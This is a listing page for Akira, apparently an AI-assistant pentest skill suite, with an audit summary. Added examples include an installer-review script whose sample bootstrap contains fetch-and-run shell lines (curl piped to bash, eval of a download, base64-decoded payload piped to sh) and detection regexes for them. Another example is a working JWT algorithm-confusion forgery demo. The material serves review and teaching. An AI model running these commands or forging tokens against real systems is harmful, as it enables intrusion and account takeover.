akira

skill
Security Audit
Warn
Health Warn
  • License — License: MIT
  • Description — Repository has a description
  • Active repo — Last push 0 days ago
  • Low visibility — Only 9 GitHub stars
Code Pass
  • Code scan — Scanned 12 files during light audit, no dangerous patterns found
Permissions Pass
  • Permissions — No dangerous permissions requested
Purpose
This is an offensive security skill suite designed to run natively inside AI coding assistants like Claude Code. It chains together multiple attack phases—ranging from initial reconnaissance to vulnerability exploitation and reporting—acting as an automated AI co-pilot for penetration testing.

Security Assessment
Risk: Medium. By design, this tool executes shell commands and makes active network requests to scan and exploit external targets. The automated code scan found no dangerous patterns, but a light scan of shell scripts can miss obfuscated or indirectly invoked behaviour. The installation process (`bash install.sh && bash bootstrap.sh`) also downloads and sets up third-party security tools (such as sqlmap and nuclei); running install scripts that fetch and execute external software is a supply chain risk, so read both scripts and pin the exact commit you reviewed before running them. No hardcoded secrets were found, but because the suite is built to hunt for sensitive data and interact with live targets, run it from an isolated environment and only against targets you are authorized to test.

Quality Assessment
The project is very new, which explains the low community visibility (only 9 GitHub stars). However, it is licensed under the standard MIT license and appears to be actively maintained, with recent updates pushed. Community trust is currently limited due to the small user base, making it a relatively untested tool in real-world, widespread deployment.

Verdict
Use with caution: the code itself lacks malicious patterns, but automatically running third-party shell scripts designed for active network exploitation carries inherent risks that require manual review and strict environment isolation.
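
The manual review the verdict asks for can be partly mechanised. The script below is an added example written for this page, not code from Akira or from its security audit: it reads a shell installer and flags the constructs a reviewer should inspect before executing it (pipe-to-shell downloads, eval of fetched content, base64-decoded payloads piped to a shell, plain-HTTP fetches, unpinned package installs, writes to shell rc files, sudo). The `SAMPLE_BOOTSTRAP` text is constructed for the example and is not the project's real bootstrap.sh; the rule names and the functions `review_script` and `needs_manual_review` are hypothetical.

```python
# Added example (not Akira's code): pre-install review of a shell installer.
import re
from typing import List, Tuple

# (label, regex) pairs; constructed for this example, extend to taste.
RULES: List[Tuple[str, str]] = [
    ("pipe-to-shell", r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    ("eval-of-download", r"\beval\b[^\n]*\$\(\s*(curl|wget)\b"),
    ("base64-decode-to-shell",
     r"\bbase64\s+(-d|--decode)\b[^\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    ("plain-http-download", r"\b(curl|wget)\b[^\n]*\bhttp://"),
    ("unpinned-go-install", r"\bgo\s+install\s+\S+@latest\b"),
    ("unpinned-pip-install",
     r"\bpip3?\s+install\b(?![^\n]*(==|-r\s|--require-hashes))"),
    ("shell-rc-persistence", r">>?\s*\S*\.(bashrc|zshrc|profile|bash_profile)\b"),
    ("privilege-escalation", r"\bsudo\b"),
]

# Constructed sample installer; NOT the project's real bootstrap.sh.
SAMPLE_BOOTSTRAP = """#!/usr/bin/env bash
# constructed sample installer for the example
set -e
go install github.com/example/scanner/cmd/scanner@latest
curl -sSL https://example.invalid/tool.sh | bash
wget -qO- http://example.invalid/helper.tar.gz | tar xz
pip install sqlmap
echo 'export PATH=$PATH:$HOME/go/bin' >> ~/.bashrc
sudo apt-get install -y nmap
eval "$(curl -fsSL https://example.invalid/env.sh)"
echo "$BLOB" | base64 -d | sh
nuclei -version
"""


def review_script(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_label, line) for every flagged line.

    Blank lines and comments are skipped; every other line is tested against
    each rule so one line can raise several labels.
    """
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for label, pattern in RULES:
            if re.search(pattern, line):
                findings.append((lineno, label, stripped))
    return findings


def needs_manual_review(text: str) -> bool:
    """True when at least one rule fired, i.e. do not run this blind."""
    return bool(review_script(text))


if __name__ == "__main__":
    for lineno, label, line in review_script(SAMPLE_BOOTSTRAP):
        print(f"line {lineno:>3}  {label:<24} {line}")
    print("needs manual review:", needs_manual_review(SAMPLE_BOOTSTRAP))
```

A clean result does not make a script safe; it only means none of these patterns appeared. Use the flagged line list as the reading order for a human review, then run the installer inside a disposable VM or container.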
SUMMARY

Open-source PentestGPT & HexStrike alternative. Phase-chained AI pentest co-pilot with 12 attack skills, real CVE proof, and zero hallucinations. Runs in Claude Code, Gemini CLI, Cursor.

README.md

What Is Akira?

A complete offensive security skill suite that runs natively inside your AI coding environment - Claude Code, Gemini CLI, Cursor, Codex, or any agent.

No server. No 40-tool pre-install hell. No hallucinated findings. Every finding requires direct HTTP evidence. No proof = no finding.

/plan-engagement → /recon → /secrets → /exploit → /zerodayhunt → /triage → /report

Install

git clone https://github.com/Kalp1774/akira
cd akira && bash install.sh

To also install tools (nuclei, dalfox, subfinder, httpx, sqlmap...):

bash install.sh && bash bootstrap.sh

Open Claude Code, type /plan-engagement target.com, and go.

Full installation guide and platform setup in the Wiki - Installation.


Skills

Full technique details and examples in the Wiki - Skills.

Core 7-Phase Lifecycle

| Skill | Phase | What It Does |
|---|---|---|
| /plan-engagement | 0 | Scope definition, PTT generation, session.json init |
| /recon | 1 | Subdomains, live hosts, ports, URLs, tech stack fingerprint |
| /secrets | 2 | API keys, tokens, credentials in JS/source/git/Postman |
| /exploit | 3 | XSS, SQLi, nuclei, deserialization, SSTI, XXE, NoSQLi |
| /zerodayhunt | 3+ | JWT confusion, SSRF->IAM, WAF bypass, type juggling |
| /triage | 4 | Severity clustering, confidence scoring (0-100), FP gate |
| /report | 5 | Pentest report or HackerOne/Bugcrowd submission format |

Specialized Attack Modules

Full attack technique walkthroughs in the Wiki - Attack Techniques.

| Skill | What It Does |
|---|---|
| /ad-attacks | BloodHound, Kerberoasting, DCSync, Golden/Silver Ticket, ADCS ESC1-8 |
| /oauth-attacks | Redirect URI bypass, CSRF, PKCE downgrade, JWT confusion |
| /race-conditions | HTTP/2 single-packet attack, coupon reuse, double-spend, OTP bypass |
| /cloud-audit | AWS SSRF->IAM, S3 enum, GCP, Azure, K8s unauthenticated API |
| /ctf | HackTheBox/TryHackMe - web/crypto/pwn/RE/forensics/OSINT/stego |

Proof It Works

Real anonymized findings made with Akira. Full writeups in FINDINGS.md.

| # | Type | Severity | Bounty | Skill Chain |
|---|---|---|---|---|
| 1 | SSRF → AWS IAM Credential Extraction | Critical | $2,500 | /recon → /exploit → /cloud-audit |
| 2 | OAuth Open Redirect → Auth Code Interception | Critical | $1,800 | /recon → /oauth-attacks |
| 3 | Race Condition: Coupon Applied 7x | High | $800 | /race-conditions |
| 4 | Strapi SSRF Bypass + MIME Fail-Open (CVE filed) | Critical | - | /zerodayhunt |
| 5 | JWT RS256→HS256 Confusion → Admin Access | Critical | $1,500 | /zerodayhunt |
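
Finding 5 above, and the /zerodayhunt and /oauth-attacks rows earlier, name JWT RS256→HS256 algorithm confusion. The following is an added example written for this page, not Akira's code and not the verifier from the finding: it shows the server-side defect (the verifier lets the token header choose the algorithm and hands the same key bytes to whichever one is named, so the RSA public key, which is public, becomes the HMAC secret) next to the hardened form that pins the algorithm. The RSA key is a constructed toy built from two Mersenne primes with unpadded textbook RSA over the SHA-256 digest, used only so the example runs with the standard library; the functions `make_token`, `verify_vulnerable`, `verify_hardened` and `forge_admin_token` are hypothetical names.

```python
# Added example (not Akira's code): JWT RS256 -> HS256 algorithm confusion.
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed toy RSA key: two Mersenne primes, unpadded "textbook" RSA over the
# SHA-256 digest. It exists only so the example runs offline; never use it.
_P = (1 << 521) - 1            # M521, prime
_Q = (1 << 127) - 1            # M127, prime
N = _P * _Q                    # 648-bit modulus, so every 256-bit digest is < N
E = 65537
D = pow(E, -1, (_P - 1) * (_Q - 1))   # server-private exponent

# Stand-in for the PEM/JWKS bytes a server publishes for token verification.
PUBLIC_KEY_BYTES = f"rsa-public:{N}:{E}".encode()


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _parse_public_key(key_bytes: bytes) -> Tuple[int, int]:
    _, n, e = key_bytes.decode().split(":")
    return int(n), int(e)


def rsa_sign(signing_input: bytes) -> bytes:
    """Server side: textbook RSA over the digest with the private exponent."""
    digest = int.from_bytes(hashlib.sha256(signing_input).digest(), "big")
    return pow(digest, D, N).to_bytes((N.bit_length() + 7) // 8, "big")


def rsa_verify(signing_input: bytes, sig: bytes, key_bytes: bytes) -> bool:
    n, e = _parse_public_key(key_bytes)
    digest = int.from_bytes(hashlib.sha256(signing_input).digest(), "big")
    return pow(int.from_bytes(sig, "big"), e, n) == digest


def make_token(payload: dict, alg: str, key_bytes: bytes) -> str:
    header_b64 = _b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload_b64 = _b64url_encode(json.dumps(payload).encode())
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if alg == "RS256":
        sig = rsa_sign(signing_input)
    elif alg == "HS256":
        sig = hmac.new(key_bytes, signing_input, hashlib.sha256).digest()
    else:
        raise ValueError("unsupported alg")
    return f"{header_b64}.{payload_b64}.{_b64url_encode(sig)}"


def verify_vulnerable(token: str, key_bytes: bytes) -> Optional[dict]:
    """Bug: the header's alg selects the routine and the same key bytes feed
    both, so with alg=HS256 the public key is used as the HMAC secret."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    signing_input = f"{header_b64}.{payload_b64}".encode()
    sig = _b64url_decode(sig_b64)
    if header.get("alg") == "RS256":
        ok = rsa_verify(signing_input, sig, key_bytes)
    elif header.get("alg") == "HS256":
        expected = hmac.new(key_bytes, signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(expected, sig)
    else:
        ok = False
    return json.loads(_b64url_decode(payload_b64)) if ok else None


def verify_hardened(token: str, key_bytes: bytes) -> Optional[dict]:
    """Fix: the server decides the algorithm (RS256, because the configured
    key is an RSA public key) and only checks that the header agrees; HS256
    or none in the header is rejected before any cryptography runs."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "RS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if not rsa_verify(signing_input, _b64url_decode(sig_b64), key_bytes):
        return None
    return json.loads(_b64url_decode(payload_b64))


def forge_admin_token(public_key_bytes: bytes) -> str:
    """Attacker side: only the public key is needed to mint an HS256 token."""
    return make_token({"sub": "admin", "role": "admin"}, "HS256", public_key_bytes)


if __name__ == "__main__":
    legit = make_token({"sub": "alice", "role": "user"}, "RS256", PUBLIC_KEY_BYTES)
    forged = forge_admin_token(PUBLIC_KEY_BYTES)
    print("legit,  vulnerable verifier:", verify_vulnerable(legit, PUBLIC_KEY_BYTES))
    print("forged, vulnerable verifier:", verify_vulnerable(forged, PUBLIC_KEY_BYTES))
    print("forged, hardened verifier  :", verify_hardened(forged, PUBLIC_KEY_BYTES))
```

When testing a real target the same idea applies with the server's actual PEM or JWKS key: the exact bytes matter (header/footer lines, trailing newline), because that byte string is what a confused verifier feeds to HMAC.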

Why Not PentestGPT?

| Capability | PentestGPT | HexStrike | Akira |
|---|---|---|---|
| Full 6-phase engagement lifecycle | Partial | - | YES |
| Phase artifact handoffs (session.json) | - | - | YES |
| Anti-hallucination evidence gate | - | - | YES |
| Confidence scoring per finding (0-100) | - | - | YES |
| AD full chain (BloodHound → DCSync) | - | Partial | YES |
| OAuth/OIDC exploitation suite | - | - | YES |
| Race conditions (single-packet attack) | - | - | YES |
| Cloud audit (AWS + GCP + Azure + K8s) | - | Partial | YES |
| CTF mode (HackTheBox, TryHackMe) | YES | - | YES |
| Native in Claude Code, Gemini, Cursor | Partial | - | YES |
| Free + MIT | YES | Partial | YES |

Roadmap

See the full roadmap in the Wiki.

| Release | ETA | New Skills |
|---|---|---|
| Hydra v1.0.0 | Shipped | 12 core skills |
| Basilisk v1.1.0 | Month 2 | graphql, deserialization, prototype-pollution, supply-chain, ci-cd-audit |
| Raven v1.2.0 | Month 3 | Akira Context Engine, cache-attacks, csp-bypass |
| Phantom v1.3.0 | Month 4 | mobile, burp-integration |
| Leviathan v2.0.0 | Month 6 | Akira Brain, postmap-recon, red-team |

Contributing

Found a technique that belongs in Akira? Fix a skill bug? Submit a real finding?

See CONTRIBUTING.md and the Wiki - Contributing - PRs welcome, fast review.


Legal

For authorized security testing only - bug bounty programs, systems you own, CTF competitions.

Unauthorized testing is illegal. Authors not responsible for misuse.


Built for bug hunters, by bug hunters.

Star this repo to stay updated when new skills ship.
